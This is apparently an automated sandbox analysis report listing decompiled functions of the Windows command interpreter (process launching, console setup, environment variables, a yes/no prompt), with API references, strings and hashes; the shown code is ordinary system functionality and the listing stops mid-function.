							_t119 = CreateProcessW( *(_t178 - 0x68),  *(_t178 - 0x74), 0, 0, _t170, 0x80000, 0, 0x4a755260, _t178 - 0xe4, _t178 - 0x98);
							goto L12;
						} else {
							_push(_t178 - 0x98);
							_push(_t178 - 0xe4);
							_t176 = 0x4a755260;
							_push(0x4a755260);
							_push(0);
							_push(0x80000);
							_push(_t170);
							_push(0);
							_push(0);
							_push( *(_t178 - 0x74));
							_push( *(_t178 - 0x68));
							_push( *((intOrPtr*)(_t119 + 0x30)));
							"^$uJh$uJr$uJ|$uJ"();
							L12:
							 *(_t178 - 0x64) = _t119;
							if(_t119 == 0) {
								_t122 = GetLastError();
								 *(_t178 - 0x70) = _t122;
								 *0x4a754128 = _t122;
							} else {
								 *(_t178 - 0x60) =  *(_t178 - 0x98);
								CloseHandle( *(_t178 - 0x94));
							}
							E4A731730(L"COPYCMD",  *((intOrPtr*)(_t178 - 0x6c)));
							if( *(_t178 - 0x64) == 0) {
								__eflags =  *0x4a754081; // 0x0
								if(__eflags == 0) {
									L42:
									__eflags =  *0x4a754128 - 0x2e4;
									if( *0x4a754128 != 0x2e4) {
										L51:
										__eflags =  *(_t178 - 0x64);
										if( *(_t178 - 0x64) != 0) {
											goto L15;
										}
										_t174 = E4A731896(0x208);
										__eflags = _t174;
										if(_t174 != 0) {
											E4A73185A(_t174, 0x104,  *(_t178 - 0x68));
											E4A74065B(_t174, _t174);
											E4A73142E(_t174);
										}
										goto L36;
									}
									L43:
									_t171 = 0x3c;
									_t147 = memset(_t178 - 0x120, 0, _t171);
									_t180 = _t180 + 0xc;
									 *(_t178 - 0x120) = _t171;
									 *((intOrPtr*)(_t178 - 0x11c)) = 0x8140;
									__imp__GetConsoleWindow();
									 *(_t178 - 0x118) = _t147;
									 *(_t178 - 0x110) =  *(_t178 - 0x68);
									 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0x7c)) + 0x3c));
									 *(_t178 - 0x108) = _t176;
									 *(_t178 - 0x104) =  *(_t178 - 0xb4) & 0x0000ffff;
									 *((intOrPtr*)(_t178 - 4)) = 1;
									_t153 =  *0x4a75403c(_t178 - 0x120);
									 *(_t178 - 0x64) = _t153;
									__eflags = _t153;
									if(_t153 == 0) {
										_t154 =  *(_t178 - 0x100);
										__eflags = _t154;
										if(_t154 != 0) {
											__eflags = _t154 - 0x20;
											if(_t154 != 0x20) {
												 *0x4a754128 = _t154;
											} else {
												 *0x4a754128 = 2;
											}
										} else {
											 *0x4a754128 = 8;
										}
									} else {
										 *(_t178 - 0x60) =  *(_t178 - 0xe8);
									}
									 *((intOrPtr*)(_t178 - 4)) = 0;
									_t170 = 1;
									__eflags = 1;
									goto L51;
								}
								__eflags =  *0x4a754128 - 0xc1;
								if( *0x4a754128 == 0xc1) {
									goto L43;
								}
								goto L42;
							} else {
								L15:
								_t164 =  *(_t178 - 0x60);
								_t174 = _t164 & _t170;
								_t126 = _t164 >> 0x00000001 & _t170;
								if(_t164 == 0) {
									L32:
									 *(_t178 + 0xc) = 4;
									L18:
									 *(_t178 - 0x70) = 0;
									 *0x4a7541bc = _t170;
									if( *(_t178 + 0xc) == 0) {
										_t130 = E4A733BE0(_t164, _t164);
										 *0x4a754188 = _t130;
										 *(_t178 - 0x60) = 0;
										_t170 = _t130;
										 *(_t178 - 0x70) = _t170;
										E4A73179D(_t178 - 0x5c, 0x14, L"%08X", _t170);
										E4A731730(L"=ExitCode", _t178 - 0x5c);
										_t53 = _t170 - 0x20; // -32
										if(_t53 <= 0x5e) {
											E4A73179D(_t178 - 0x34, 0xc, L"%01C", _t170);
											_push(_t178 - 0x34);
										} else {
											_push(E4A731794);
										}
										_push(L"=ExitCodeAscii");
										_t139 = E4A731730();
										if(_t174 != 0) {
											E4A74CF50(_t139);
										}
									} else {
										__eflags =  *(_t178 + 0xc) - 4;
										if( *(_t178 + 0xc) == 4) {
											__eflags = _t164;
											if(_t164 != 0) {
												CloseHandle(_t164);
												 *(_t178 - 0x60) = 0;
											}
										} else {
											__eflags =  *(_t178 + 0xc) - 2;
											if( *(_t178 + 0xc) == 2) {
												 *0x4a754180 = _t164;
											}
										}
									}
									 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
									E4A7340C5();
									goto L23;
								}
								_t198 =  *0x4a754081; // 0x0
								if(_t198 == 0) {
									goto L18;
								}
								_t199 =  *0x4a7540b4; // 0x0
								if(_t199 == 0) {
									__eflags =  *0x4a7540e0; // 0x0
									if(__eflags != 0) {
										goto L18;
									}
									__eflags =  *0x4a7540e4; // 0x0
									if(__eflags != 0) {
										goto L18;
									}
									__eflags =  *(_t178 + 0xc);
									if( *(_t178 + 0xc) == 0) {
										__eflags = _t126;
										if(_t126 != 0) {
											goto L32;
										}
										_t141 = E4A74D7C9(_t164);
										_t165 = 2;
										__eflags = _t165 - _t141;
										_t164 =  *(_t178 - 0x60);
										if(_t165 == _t141) {
											goto L32;
										}
									}
								}
								goto L18;
							}
						}
					}
					_t190 =  *0x4a7540e4; // 0x0
					if(_t190 == 0) {
						_t160 =  *0x4a7540b4; // 0x0
						__eflags = _t160;
						if(_t160 != 0) {
							goto L7;
						}
						goto L11;
					}
					goto L7;
				}
			}

0x4a733e02
0x4a733e0c
0x4a733e14
0x4a733e1a
0x4a733e1d
0x4a733e20
0x4a733e25
0x4a733e2b
0x4a733e31
0x4a733e34
0x4a733e42
0x4a733e44
0x4a733e4b
0x4a733e53
0x4a7456e4
0x4a7456ea
0x4a7456ef
0x4a73406c
0x4a734071
0x4a734071
0x4a733e59
0x4a733e6a
0x4a733e71
0x4a733e79
0x4a7456fc
0x4a745702
0x4a74570e
0x00000000
0x4a733e7f
0x4a733e81
0x4a733e8b
0x4a733e90
0x4a733e99
0x4a733e9f
0x4a733ea8
0x4a733eae
0x4a733eb4
0x4a733ebc
0x4a733ebd
0x4a733ec3
0x4a733ec9
0x4a733ed1
0x4a733ed8
0x4a733ee9
0x4a733ef5
0x4a733efb
0x4a733efe
0x4a733f0b
0x4a733f0d
0x4a733f0d
0x4a733f13
0x4a733f18
0x4a733f1d
0x4a745716
0x4a745716
0x4a74571b
0x4a74571c
0x4a745721
0x00000000
0x4a745726
0x4a733f23
0x4a733f29
0x4a733f37
0x4a733f3c
0x4a733f43
0x4a745731
0x4a745731
0x4a733f59
0x4a733f60
0x4a733f6b
0x4a733f79
0x4a733f8e
0x00000000
0x4a74573b
0x4a745741
0x4a745748
0x4a745749
0x4a74574e
0x4a74574f
0x4a745750
0x4a745755
0x4a745756
0x4a745757
0x4a745758
0x4a74575b
0x4a74575e
0x4a745761
0x4a733f94
0x4a733f94
0x4a733f99
0x4a74576c
0x4a745772
0x4a745775
0x4a733f9f
0x4a733fa5
0x4a733fae
0x4a733fae
0x4a733fbc
0x4a733fc4
0x4a74577f
0x4a745785
0x4a745793
0x4a745793
0x4a74579d
0x4a745873
0x4a745873
0x4a745876
0x00000000
0x00000000
0x4a745886
0x4a745888
0x4a74588a
0x4a745899
0x4a74589f
0x4a7458a5
0x4a7458a5
0x00000000
0x4a74588a
0x4a7457a3
0x4a7457a5
0x4a7457af
0x4a7457b4
0x4a7457b7
0x4a7457bd
0x4a7457c7
0x4a7457cd
0x4a7457d6
0x4a7457e2
0x4a7457e8
0x4a7457f5
0x4a7457fb
0x4a745809
0x4a74580f
0x4a745812
0x4a745814
0x4a745821
0x4a745827
0x4a745829
0x4a745837
0x4a74583a
0x4a745848
0x4a74583c
0x4a74583c
0x4a74583c
0x4a74582b
0x4a74582b
0x4a74582b
0x4a745816
0x4a74581c
0x4a74581c
0x4a74586d
0x4a745872
0x4a745872
0x00000000
0x4a745872
0x4a745787
0x4a745791
0x00000000
0x00000000
0x00000000
0x4a733fca
0x4a733fca
0x4a733fca
0x4a733fcf
0x4a733fd5
0x4a733fd9
0x4a73ceaf
0x4a73ceaf
0x4a733ff3
0x4a733ff3
0x4a733ff6
0x4a733fff
0x4a734006
0x4a73400b
0x4a734010
0x4a734013
0x4a734015
0x4a734024
0x4a734035
0x4a73403a
0x4a734040
0x4a7458e6
0x4a7458f1
0x4a734046
0x4a734046
0x4a734046
0x4a73404b
0x4a734050
0x4a734057
0x4a7458f7
0x4a7458f7
0x4a73ce7e
0x4a73ce7e
0x4a73ce82
0x4a745901
0x4a745903
0x4a74590a
0x4a745910
0x4a745910
0x4a73ce88
0x4a73ce88
0x4a73ce8c
0x4a73ce92
0x4a73ce92
0x4a73ce8c
0x4a73ce82
0x4a73405d
0x4a734064
0x00000000
0x4a734069
0x4a733fdf
0x4a733fe5
0x00000000
0x00000000
0x4a733fe7
0x4a733fed
0x4a7375c3
0x4a7375c9
0x00000000
0x00000000
0x4a7375cf
0x4a7375d5
0x00000000
0x00000000
0x4a7458af
0x4a7458b2
0x4a7458b8
0x4a7458ba
0x00000000
0x00000000
0x4a7458c1
0x4a7458c8
0x4a7458c9
0x4a7458cc
0x4a7458cf
0x00000000
0x00000000
0x4a7458d5
0x4a7458b2
0x00000000
0x4a733fed
0x4a733fc4
0x4a733f60
0x4a733f2b
0x4a733f31
0x4a73ce9d
0x4a73cea2
0x4a73cea4
0x00000000
0x00000000
0x00000000
0x4a73ceaa
0x00000000
0x4a733f31

APIs

InitializeProcThreadAttributeList.KERNEL32(?,00000001,00000000,00000020), ref: 4A733E4B
UpdateProcThreadAttribute.KERNEL32(?,00000000,00060001,?,00000004,00000000,00000000), ref: 4A733E71
memset.MSVCRT ref: 4A733E8B
GetStartupInfoW.KERNEL32(00000044), ref: 4A733EE9

Part of subcall function 4A73321B: _wcsnicmp.MSVCRT ref: 4A73329D

lstrcmpW.KERNEL32(00000000,\XCOPY.EXE,?,0000005C,00000000,COPYCMD), ref: 4A733F4B
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00080000,00000000,4A755260,?,?), ref: 4A733F8E
CloseHandle.KERNEL32(?), ref: 4A733FAE
GetLastError.KERNEL32 ref: 4A7456DE
GetLastError.KERNEL32 ref: 4A7456F6
DeleteProcThreadAttributeList.KERNEL32(?,?), ref: 4A74570E
_local_unwind4.MSVCRT ref: 4A745721

Strings

%01C, xrefs: 4A7458DB
COPYCMD, xrefs: 4A733EFE, 4A733F03, 4A733FB7, 4A745730
^$uJh$uJr$uJ|$uJ, xrefs: 4A745761
\XCOPY.EXE, xrefs: 4A733F45
=ExitCodeAscii, xrefs: 4A73404B
=ExitCode, xrefs: 4A734030
%08X, xrefs: 4A734019

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributeProcThread$ErrorLastList$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_local_unwind4_wcsnicmplstrcmpmemset
String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$^$uJh$uJr$uJ|$uJ
API String ID: 2658032697-2131258224
Opcode ID: 1724bb72e86c30a3366867f0a31e0cfc26a7b6d555973c5225c74375a124edd2
Instruction ID: 16fa2199b269cc72680111e187a39b1826d4b1a2f5d882fd78d3a87fcf952943
Opcode Fuzzy Hash: 1724bb72e86c30a3366867f0a31e0cfc26a7b6d555973c5225c74375a124edd2
Instruction Fuzzy Hash: 10C16EB1D49619EBDB70DF91C885ADDBFB9BB09311F1241AAE609EB502D7304E88CF11

Uniqueness

Uniqueness Score: -1.00%

Function 4A7384E3, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 225
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E4A7384E3(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v72;
				intOrPtr* _v76;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t21;
				WCHAR* _t29;
				struct HINSTANCE__* _t44;
				intOrPtr* _t48;
				intOrPtr* _t60;
				int _t65;
				int _t70;
				void* _t72;
				void* _t73;
				short* _t77;
				void* _t79;
				WCHAR** _t80;
				short _t84;
				void* _t85;
				intOrPtr _t88;
				signed int _t91;
				void* _t92;
				void* _t102;

				_t19 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t19 ^ _t91;
				_t87 = _a4;
				_v76 = _a4;
				if(_a8 < 3) {
					_t21 = 0;
					goto L16;
				} else {
					 *0x4a7541a4 = 0x4a754220;
					InitializeCriticalSection(0x4a754220);
					E4A731E6C(0x4a754220);
					SetConsoleCtrlHandler(E4A74E72A, 1);
					E4A731605();
					E4A737AF3();
					E4A737E13(_t87, _a8);
					_t88 = GetCommandLineW;
					_t29 = GetCommandLineW();
					_t6 =  &(_t29[1]); // 0x2
					_t77 = _t6;
					do {
						_t84 =  *_t29;
						_t29 =  &(_t29[1]);
					} while (_t84 != 0);
					_push(_t85);
					_t86 = 0x2000;
					if((_t29 - _t77 >> 1) + 1 > 0x2000) {
						_push(0);
						E4A736D44(_t77);
						_t79 = 0x400023df;
						_push(1);
						L29:
						_t35 = E4A7372E9(_t79, _t86, _t88, __eflags);
						L30:
						_t80 =  *0x4a7541a8; // 0x0
						 *_t80 = _t35;
						L9:
						_t102 =  *0x4a7540e4 - _t86; // 0x0
						if(_t102 == 0) {
							_t35 = E4A734490(_t35, 1);
							__eflags = _t35;
							if(_t35 == 0) {
								goto L10;
							}
							__eflags =  *0x4a75408a - _t86; // 0x0
							if(__eflags != 0) {
								L26:
								_push( *0x4a75408a & 0x0000ffff);
								_t35 = E4A740AF9();
								goto L10;
							}
							_t35 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v100);
							__eflags = _t35;
							if(_t35 != 0) {
								_t35 = _v100.wAttributes;
								 *0x4a75408a = _v100.wAttributes;
							}
							__eflags =  *0x4a75408a - _t86; // 0x0
							if(__eflags == 0) {
								goto L10;
							} else {
								goto L26;
							}
						}
						L10:
						if( *((intOrPtr*)(_t88 + 8)) == _t86) {
							_t73 = E4A74E3E9(_t35, L"%WINDOWS_COPYRIGHT%", _t86);
							E4A73D3B3( &_v72, 0x20);
							E4A7399E1(_t80, 0x2350, 1,  &_v72);
							_push(0x4a7545a8);
							E4A7358F3();
							__eflags = _t73 - _t86;
							if(_t73 == _t86) {
								_push(_t86);
								E4A736D44(_t80);
								_t80 = 8;
							} else {
								E4A7358F3(E4A732CB4, _t73);
								_push(0x4a7545a8);
								E4A7358F3();
							}
							GlobalFree(_t73);
							__eflags =  *0x4a770670;
							if( *0x4a770670 == 0) {
								__eflags =  *0x4a754081;
								if( *0x4a754081 != 0) {
									_push(_t86);
									_push(0x4000239f);
									E4A7399E1(_t80);
								}
							}
						}
						_t44 = GetModuleHandleW(L"KERNEL32.DLL");
						_t87 = GetProcAddress;
						 *0x4a754094 = _t44;
						 *0x4a7541ec = GetProcAddress(_t44, "CopyFileExW");
						 *0x4a7541e4 = GetProcAddress( *0x4a754094, "IsDebuggerPresent");
						 *0x4a7541f4 = GetProcAddress( *0x4a754094, "SetConsoleInputExeNameW");
						_t48 = _v76;
						_pop(_t72);
						if( *_t48 != _t86 ||  *((intOrPtr*)(_t48 + 4)) != _t86 ||  *((intOrPtr*)(_t48 + 8)) != _t86) {
							_t21 = 1;
						} else {
							_t21 = 0;
						}
						_pop(_t85);
						L16:
						return E4A7313A9(_t21, _t72, _v8 ^ _t91, _t84, _t85, _t87);
					}
					_push(_t72);
					E4A73185A(0x4a768640, 0x2000, GetCommandLineW());
					_t86 = 0x4a755260;
					E4A732C56(0x104, _t84, 0x4a755260, 0x4a755260, 0x104, 0);
					E4A7386C9(0x104, 0x4a755260, 0x4a768640);
					_t60 = 0x4a768640;
					_t7 = _t60 + 2; // 0x4a768642
					_t80 = _t7;
					do {
						_t84 =  *_t60;
						_t60 = _t60 + 2;
					} while (_t84 != 0);
					_t88 = _v76;
					E4A738B31(0x104, 0x4a755260, _t88, _a8, 0x4a768640, _t60 - _t80 >> 1);
					if( *0x4a755260 == 0x5c) {
						__eflags =  *0x4a755262 - 0x5c;
						if( *0x4a755262 != 0x5c) {
							goto L7;
						}
						__eflags =  *0x4a7706b0;
						if( *0x4a7706b0 != 0) {
							goto L7;
						}
						E4A736D44(_t80, 0x400023c8, 1, 0x4a755260);
						_t92 = _t92 + 0xc;
						_t70 = GetWindowsDirectoryW(0x4a755260, 0x104);
						_push(1);
						__eflags = _t70;
						if(__eflags == 0) {
							goto L29;
						}
						_push(0x4a755260);
						E4A736C78();
					}
					L7:
					_t65 = GetConsoleOutputCP();
					 *0x4a7541b8 = _t65;
					GetCPInfo(_t65, 0x4a754260);
					E4A7388D9();
					_t86 = 0;
					_t35 = HeapAlloc(GetProcessHeap(), 0, 0x20c);
					 *0x4a7541a8 = _t35;
					if(_t35 == 0) {
						goto L9;
					}
					_t35 = GetConsoleTitleW(_t35, 0x104);
					if(_t35 == 0) {
						goto L30;
					}
					goto L9;
				}
			}

0x4a7384eb
0x4a7384f2
0x4a7384fa
0x4a7384fd
0x4a738500
0x4a7469ff
0x00000000
0x4a738506
0x4a73850c
0x4a738511
0x4a738517
0x4a738523
0x4a738529
0x4a73852e
0x4a738537
0x4a73853c
0x4a738542
0x4a738544
0x4a738544
0x4a738547
0x4a738547
0x4a73854b
0x4a73854c
0x4a738555
0x4a738557
0x4a73855e
0x4a746a06
0x4a746a0d
0x4a746a13
0x4a746a14
0x4a746a16
0x4a746a16
0x4a746a1b
0x4a746a1b
0x4a746a21
0x4a738605
0x4a738605
0x4a73860b
0x4a740944
0x4a740949
0x4a74094b
0x00000000
0x00000000
0x4a740951
0x4a740958
0x4a740988
0x4a74098f
0x4a740990
0x00000000
0x4a740990
0x4a740967
0x4a74096d
0x4a74096f
0x4a740971
0x4a740975
0x4a740975
0x4a74097b
0x4a740982
0x00000000
0x00000000
0x00000000
0x00000000
0x4a740982
0x4a738611
0x4a738614
0x4a746a34
0x4a746a3c
0x4a746a4c
0x4a746a56
0x4a746a57
0x4a746a5f
0x4a746a61
0x4a746a79
0x4a746a7c
0x4a746a82
0x4a746a63
0x4a746a69
0x4a746a6e
0x4a746a6f
0x4a746a74
0x4a746a84
0x4a746a8a
0x4a746a91
0x4a746a97
0x4a746a9e
0x4a746aa4
0x4a746aa5
0x4a746aaa
0x4a746ab0
0x4a746a9e
0x4a746a91
0x4a73861f
0x4a738625
0x4a738631
0x4a738643
0x4a738655
0x4a73865c
0x4a738661
0x4a738664
0x4a738667
0x4a738679
0x4a746ab6
0x4a746ab6
0x4a746ab6
0x4a73867a
0x4a73867b
0x4a738687
0x4a738687
0x4a738564
0x4a73856f
0x4a73857c
0x4a738582
0x4a738587
0x4a73858c
0x4a73858e
0x4a73858e
0x4a738591
0x4a738591
0x4a738595
0x4a738596
0x4a7385a4
0x4a7385a8
0x4a7385b5
0x4a73c16f
0x4a73c177
0x00000000
0x00000000
0x4a73c17d
0x4a73c184
0x00000000
0x00000000
0x4a73c192
0x4a73c197
0x4a73c19c
0x4a73c1a2
0x4a73c1a4
0x4a73c1a6
0x00000000
0x00000000
0x4a73c1ac
0x4a73c1ad
0x4a73c1ad
0x4a7385bb
0x4a7385bb
0x4a7385c7
0x4a7385cc
0x4a7385d2
0x4a7385dc
0x4a7385e6
0x4a7385ec
0x4a7385f3
0x00000000
0x00000000
0x4a7385f7
0x4a7385ff
0x00000000
0x00000000
0x00000000
0x4a7385ff

APIs

InitializeCriticalSection.KERNEL32(4A754220), ref: 4A738511

Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85

SetConsoleCtrlHandler.KERNEL32(4A74E72A,00000001), ref: 4A738523

Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A731618
Part of subcall function 4A731605: SetConsoleMode.KERNEL32 ref: 4A731622
Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A73162B
Part of subcall function 4A731605: GetConsoleMode.KERNEL32 ref: 4A731635
Part of subcall function 4A731605: _get_osfhandle.MSVCRT ref: 4A731652
Part of subcall function 4A731605: GetConsoleMode.KERNEL32 ref: 4A731656

Part of subcall function 4A737E13: RegOpenKeyExW.KERNEL32 ref: 4A737EA4
Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DisableUNCCheck,00000000,?,?,?), ref: 4A737EDF
Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,EnableExtensions,00000000,00000001,?,?), ref: 4A737F10
Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DelayedExpansion,00000000,00000001,?,?), ref: 4A737F58
Part of subcall function 4A737E13: RegQueryValueExW.KERNEL32(?,DefaultColor,00000000,00000001,?,?), ref: 4A737F89

GetCommandLineW.KERNEL32(?,00000003), ref: 4A738542
GetCommandLineW.KERNEL32(00000000,?), ref: 4A738565
GetConsoleOutputCP.KERNEL32 ref: 4A7385BB
GetCPInfo.KERNEL32(00000000,4A754260), ref: 4A7385CC
GetProcessHeap.KERNEL32(00000000,0000020C), ref: 4A7385DF
HeapAlloc.KERNEL32(00000000), ref: 4A7385E6
GetConsoleTitleW.KERNEL32 ref: 4A7385F7
GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 4A73861F
GetProcAddress.KERNEL32(00000000,CopyFileExW), ref: 4A738636
GetProcAddress.KERNEL32(IsDebuggerPresent), ref: 4A738648
GetProcAddress.KERNEL32(SetConsoleInputExeNameW), ref: 4A73865A

Strings

KERNEL32.DLL, xrefs: 4A73861A
SetConsoleInputExeNameW, xrefs: 4A73864A
CopyFileExW, xrefs: 4A73862B
%WINDOWS_COPYRIGHT%, xrefs: 4A746A2A
IsDebuggerPresent, xrefs: 4A738638

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$QueryValue$AddressCriticalModeProcSection_get_osfhandle$CommandHeapLine$AllocCtrlEnterHandleHandlerInfoInitializeLeaveModuleOpenOutputProcessTitle
String ID: %WINDOWS_COPYRIGHT%$CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 4158127395-2796496087
Opcode ID: 55f7674d9f96ad6546ee6b3655e0c0db19196e5587383385d5237f4113af7f0c
Instruction ID: 0268af57c9192c0c42b277a3ac9fd088e8eb99ad42f68a8d5bb0411dd7fc5da7
Opcode Fuzzy Hash: 55f7674d9f96ad6546ee6b3655e0c0db19196e5587383385d5237f4113af7f0c
Instruction Fuzzy Hash: 437147B1A4DA11EAEB709BA1CC4DA9A3FBCEB46351F134015E501DB943DB784D48CB25

Uniqueness

Uniqueness Score: -1.00%

Function 4A732070, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 123COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,4A760640,00002000,75A9F670,?,?,4A73BEFF,00000000), ref: 4A73208E
_wcsicmp.MSVCRT ref: 4A732CF2
_wcsicmp.MSVCRT ref: 4A732D06
_wcsicmp.MSVCRT ref: 4A732D1A
_wcsicmp.MSVCRT ref: 4A732D2E
_wcsicmp.MSVCRT ref: 4A732D42
_wcsicmp.MSVCRT ref: 4A732D56

Strings

ERRORLEVEL, xrefs: 4A732CFE
CMDEXTVERSION, xrefs: 4A732D12
TIME, xrefs: 4A732D4E
DATE, xrefs: 4A732D3A
CMDCMDLINE, xrefs: 4A732D26
HIGHESTNUMANODENUMBER, xrefs: 4A732E18
RANDOM, xrefs: 4A732E04

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsicmp$EnvironmentVariable
String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 198002717-2301591722
Opcode ID: 426c71c455b61c7da8905a566a5a7becf0630357fa666f0aaa1631d0091c36c6
Instruction ID: 8fe4115b44368f9b3a9117c9e6d99efbebf839dea6760e5e2766a44889741f54
Opcode Fuzzy Hash: 426c71c455b61c7da8905a566a5a7becf0630357fa666f0aaa1631d0091c36c6
Instruction Fuzzy Hash: 6B31D67211DA127AEF341B65DC09E9A3FADEF562B1B124026F605DD491EF21C908D3A8

Uniqueness

Uniqueness Score: -1.00%

Function 4A74FE1B, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E4A74FE1B(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				long _v40;
				char _v41;
				char _v42;
				char _v43;
				long _v48;
				signed int _v52;
				long _v56;
				void* _v60;
				void* _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _v80;
				void* __esi;
				signed int _t57;
				void* _t60;
				intOrPtr* _t63;
				void* _t69;
				void* _t71;
				void* _t73;
				wchar_t* _t76;
				signed int _t79;
				intOrPtr* _t82;
				signed short _t94;
				intOrPtr* _t100;
				void* _t112;
				void* _t115;
				intOrPtr _t119;
				void* _t123;
				void _t129;
				void* _t131;
				void* _t132;
				void* _t133;
				void* _t135;
				signed int _t138;
				signed int _t139;
				void* _t140;

				_t133 = __edi;
				_t131 = __edx;
				_t117 = __ecx;
				_t115 = __ebx;
				_t57 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t57 ^ _t139;
				_t59 = _a4;
				_v52 = _v52 & 0x00000000;
				_v68 = _a4;
				_v43 = 0;
				_v41 = 0;
				if(_a8 != 0x400023d3) {
					L5:
					_push(_a12);
					_t60 = E4A73C56B(_t117);
					_t135 = _t60;
					if(_t135 == 0) {
						L10:
						E4A73185A( &_v40, 0x10, L"NY");
						goto L11;
					} else {
						_t10 = _t60 + 2; // 0x2
						_t132 = _t10;
						do {
							_t129 =  *_t60;
							_t60 = _t60 + 2;
						} while (_t129 != 0);
						if(_t60 - _t132 >> 1 >= 0x10) {
							goto L10;
						}
						E4A73185A( &_v40, 0x10, _t135);
						__imp___wcsupr( &_v40);
						L11:
						_t63 =  &_v40;
						_t15 = _t63 + 2; // 0x2
						_t131 = _t15;
						do {
							_t119 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t119 != 0);
						_push(_t115);
						_push(_t133);
						_v80 = (_t63 - _t131 >> 1) - 1;
						LocalFree(_t135);
						_t69 = GetStdHandle(0xfffffff5);
						_v64 = _t69;
						if(GetConsoleMode(_t69,  &_v56) != 0) {
							_v43 = 1;
							SetConsoleMode(_v64, _v56 | 0x00000001);
						}
						_t71 = GetStdHandle(0xfffffff6);
						_t121 =  &_v72;
						_v60 = _t71;
						if(GetConsoleMode(_t71,  &_v72) != 0) {
							_v41 = 1;
							SetConsoleMode(_v60, _v72 | 0x00000007);
							_t100 =  *0x4a7541f4; // 0x0
							if(_t100 != 0) {
								 *_t100(L"<noalias>");
							}
						}
						goto L18;
						do {
							do {
								L18:
								_v48 = 0;
								_v42 = 1;
								if(_v68 == 0) {
									_push(0);
									_push(_a8);
									_t73 = E4A7399E1(_t121);
									_pop(_t123);
								} else {
									_t73 = E4A7399E1(_t121, _a8, 1, _v68);
									_t140 = _t140 + 0xc;
								}
								if(E4A733B03(_t73, _t123, 0) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								while(_v48 != 0xa) {
									_push( &_v76);
									_push(1);
									if(E4A7367D3(GetStdHandle(0xfffffff6),  &_v48) != 0 && _v76 == 1) {
										if(_v42 != 0) {
											_t94 = towupper(_v48);
											_t88 = _t94 & 0x0000ffff;
											_pop(_t123);
											_v52 = _t94 & 0x0000ffff;
											_v42 = 0;
										}
										if(E4A733B03(_t88, _t123, 0) == 0 || ( *0x4a754154 & 0x00000001) == 0) {
											E4A7358F3(0x4a7545b8, _v48 & 0x0000ffff);
											_pop(_t123);
										}
										continue;
									}
									_push(0x4a7545a8);
									_v52 = _v40 & 0x0000ffff;
									E4A7358F3();
									goto L33;
								}
								L33:
								_t76 = wcschr( &_v40, _v52);
								_pop(_t121);
							} while (_t76 == 0);
							_t121 =  &_v40;
							_t138 = _t76 -  &_v40 >> 1;
						} while (_t138 > _v80);
						if(_v43 != 0) {
							SetConsoleMode(_v64, _v56);
						}
						if(_v41 != 0) {
							SetConsoleMode(_v60, _v72);
							_t82 =  *0x4a7541f4; // 0x0
							if(_t82 != 0) {
								 *_t82(L"CMD.EXE");
							}
						}
						_pop(_t133);
						_t79 = _t138;
						_pop(_t115);
						L41:
						return E4A7313A9(_t79, _t115, _v8 ^ _t139, _t131, _t133, _t138);
					}
				}
				_t138 = E4A741F66(_t59, 0);
				if(_t138 == 0xffffffff) {
					goto L5;
				}
				_t112 = E4A733B03(_t111, __ecx, _t138);
				_push(_t138);
				if(_t112 == 0) {
					E4A733AB3();
					goto L5;
				} else {
					E4A733AB3();
					_pop(_t79);
					goto L41;
				}
			}

0x4a74fe1b
0x4a74fe1b
0x4a74fe1b
0x4a74fe1b
0x4a74fe23
0x4a74fe2a
0x4a74fe2d
0x4a74fe30
0x4a74fe3c
0x4a74fe3f
0x4a74fe43
0x4a74fe47
0x4a74fe75
0x4a74fe75
0x4a74fe78
0x4a74fe7d
0x4a74fe82
0x4a74feb3
0x4a74febe
0x00000000
0x4a74fe84
0x4a74fe84
0x4a74fe84
